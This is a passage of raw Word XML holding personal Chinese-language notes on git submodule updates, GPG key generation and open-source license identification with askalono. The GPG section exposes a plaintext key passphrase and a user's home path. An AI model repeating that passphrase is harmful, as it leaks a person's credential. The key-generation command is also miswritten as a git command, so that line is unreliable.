          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C839250" w14:textId="59276A55" w:rsidR="001F74B2" w:rsidRDefault="001F74B2" w:rsidP="001F74B2">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>就把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0228A81C" w14:textId="501F3B01" w:rsidR="001F74B2" w:rsidRDefault="001F74B2" w:rsidP="001F74B2">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后主仓库再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git add .    git commit -m "xx"   git push </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就把子模块更新了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D909798" w14:textId="77777777" w:rsidR="001F74B2" w:rsidRDefault="001F74B2" w:rsidP="00FC3D20"/>
    <w:p w14:paraId="42C7FC17" w14:textId="77777777" w:rsidR="001F74B2" w:rsidRDefault="001F74B2" w:rsidP="00FC3D20"/>
    <w:p w14:paraId="30A47305" w14:textId="43EC6438" w:rsidR="00F03FCA" w:rsidRPr="006A1D21" w:rsidRDefault="00F03FCA" w:rsidP="007A4AD2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1D21">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>部署视角git pull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6588EE41" w14:textId="6584FDB0" w:rsidR="004D7755" w:rsidRPr="004D7755" w:rsidRDefault="004D7755" w:rsidP="00FC3D20">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>子模块更新和仓库本身是分离的，仓库只更新子模块的</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>hash id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7523C6" w14:textId="113BF229" w:rsidR="007A4AD2" w:rsidRDefault="007A4AD2" w:rsidP="00FC3D20"/>
    <w:p w14:paraId="7FE3D944" w14:textId="54EA2C83" w:rsidR="00FC3D20" w:rsidRDefault="00F73B14" w:rsidP="00FC3D20">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首次拉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还只是个空目录的时候），使用到</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D139997" w14:textId="25A0144A" w:rsidR="00155C1C" w:rsidRDefault="00F73B14" w:rsidP="00FC3D20">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git submodule update --init </w:t>
      </w:r>
      <w:r w:rsidR="00155C1C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>recursive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C69AF26" w14:textId="3797A845" w:rsidR="007A4AD2" w:rsidRPr="007A4AD2" w:rsidRDefault="007A4AD2" w:rsidP="00FC3D20">
      <w:r w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>拉过第一次后要再拉，就先主仓库</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>git pull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>，再更新子仓库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1328CC38" w14:textId="7F192723" w:rsidR="007A4AD2" w:rsidRPr="00155C1C" w:rsidRDefault="007A4AD2" w:rsidP="007A4AD2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git submodule update </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>recursive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051BB62F" w14:textId="77777777" w:rsidR="007A4AD2" w:rsidRPr="007A4AD2" w:rsidRDefault="007A4AD2" w:rsidP="00FC3D20">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D63A638" w14:textId="4EA5DFFA" w:rsidR="0044511E" w:rsidRDefault="0044511E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果涉及</w:t>
      </w:r>
      <w:r w:rsidRPr="00155C1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00155C1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此步在运行时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00155C1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果仓库是</w:t>
      </w:r>
      <w:r w:rsidRPr="00155C1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你需要注意</w:t>
      </w:r>
      <w:r w:rsidRPr="00155C1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不同子仓库会需要不同的密码验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此步一定慢慢等待其下载完，否则就会出现只会更新一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而另一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>死活不动的情况了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6A8D2" w14:textId="313EF9FF" w:rsidR="00155C1C" w:rsidRDefault="00155C1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000B4FB8">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000B4FB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recursive</w:t>
      </w:r>
      <w:r w:rsidRPr="000B4FB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意思是递归，比如如果子模块也有子模块，他就处理这个的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5E990" w14:textId="59BD53AC" w:rsidR="0044511E" w:rsidRPr="000B4FB8" w:rsidRDefault="000B4FB8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A3562E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git submodule update </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3562E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3562E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没有子模块的子模块，可以直接执行这个没有递归的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEE5BFF" w14:textId="77777777" w:rsidR="000B4FB8" w:rsidRDefault="000B4FB8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313258CA" w14:textId="77777777" w:rsidR="009B0CDA" w:rsidRDefault="009B0CDA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E234C38" w14:textId="77777777" w:rsidR="00327C01" w:rsidRPr="00E80108" w:rsidRDefault="00327C01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5712B7" w14:textId="0DE2631C" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc159779521"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gpg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="357BD17B" w14:textId="2B4CD044" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDE8C4E" w14:textId="37246A1F" w:rsidR="000A33CF" w:rsidRDefault="00DE54B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在目录下执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B07E65B" w14:textId="513EBDD0" w:rsidR="00DE54B4" w:rsidRDefault="00DE54B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>it –gen-key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F04C6AE" w14:textId="2730BF22" w:rsidR="00DE54B4" w:rsidRDefault="00136B12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14213B1E" w14:textId="2EC65995" w:rsidR="00136B12" w:rsidRDefault="00136B12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>assphrase: shenyanjian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAD03B1" w14:textId="40CCE910" w:rsidR="00DE54B4" w:rsidRDefault="007277C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>gpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成目录：</w:t>
      </w:r>
      <w:r w:rsidRPr="007277C8">
        <w:t>C:\Users\ranja\.gnupg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE8F12" w14:textId="5CC1686B" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CFB042" w14:textId="51AB0729" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293EA0E3" w14:textId="51119AED" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B715A47" w14:textId="1FCA8746" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B43A8F" w14:textId="405A037B" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58446A76" w14:textId="5F1B86D2" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1008F8" w14:textId="77777777" w:rsidR="000A33CF" w:rsidRPr="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1168FF9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc159779522"/>
      <w:r>
        <w:t>license</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="04230B85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>https://choosealicense.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7DACDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235D2899" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E595479" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="576" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>License</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A839F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22682030" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>开源</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA79879" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9114ED" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/licensing-a-repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DCA00F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F56917" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Choose an open source license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD8B1F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://choosealicense.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EF016" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2D754D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF9E7CF" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073ECC11" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F274FD1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>调研开源产品</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722DBBC5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>jpeddicord/askalono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F897345" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/jpeddicord/askalono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717FDE7" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E74469C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接下载下二进制文件，然后运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC59149" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>askalono.exe identify C:\Users\ranja\Downloads\askalono-Windows\license.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F63635A" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E758A1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="300F065E" wp14:editId="4B7410CD">
            <wp:extent cx="4748530" cy="1572895"/>
